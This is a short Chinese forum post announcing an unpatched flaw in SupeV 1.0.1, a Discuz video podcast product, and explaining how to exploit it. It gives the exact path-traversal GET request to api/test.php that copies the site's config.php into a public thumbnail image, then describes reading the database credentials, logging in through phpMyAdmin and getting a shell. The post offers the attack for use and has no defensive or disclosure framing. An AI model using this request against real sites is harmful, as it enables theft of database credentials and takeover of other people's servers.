SupeV 1.0.1 0DAY

[tag]discuz[/tag]

最近传得很火，还有某淫写工具来卖钱
"视频播客 SupeV 1.0.1" 即discuz旗下产品。
下面介绍利用方法：
漏洞形成，直接以get方式请求
api/test.php?thumb=../config.php&vid=../../1会把config.php复制到attachments\thumb\1.jpg(不是根目录),

这样就得到了网站的配置文件，phpmyadmin连上去，然后获得shell。
不会的请参见网上相应文章。